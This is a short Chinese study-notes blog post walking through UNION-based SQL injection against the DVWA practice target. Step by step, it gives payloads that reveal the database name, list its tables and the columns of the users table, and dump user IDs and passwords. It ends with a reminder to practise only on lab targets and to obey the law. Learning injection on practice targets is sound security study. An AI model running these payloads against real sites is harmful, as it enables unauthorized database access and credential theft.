今天尝试了SQL注入靶机爆库爆表操作,分享如下:
1.设置靶机安全级别为低级
2.进入SQL注入界面
3.输入1提交
3.用单引号让id闭合,输入1’ union select 1, database()#(此处做补充说明下,语句闭合时在数据库执行的SQL语句如下:“select frist_name,surname from 表名 where user_ID=‘1’ union select 1,database()”,所以构架关联的时候字段为2,获取你所需要获得的信息;如只有一个就加上1或其他,补足关联表后所需字段内容。)
4.既然知道了数据库,就尝试爆出数据库中的表,输入
1’ union select 1,table_name from information_schema.tables where table_schema=‘dvwa’#
5.爆出表名如上图所示,尝试爆出users表的列,输入
1’ union select 1,column_name from information_schema.columns where table_name=‘users’#
6.关注该表中的关键字段id和password,尝试爆数据,输入
1’ union select user_id,password from users#
该内容仅用于学习,请遵守国家相关法律法规,不要将技术用于非法行径,学习时请不要对网站进行操作,共同维护绿色网络环境,请使用靶机进行练习。
web安全学习笔记(三)——SQL注入靶机测试
最新推荐文章于 2024-04-29 20:54:11 发布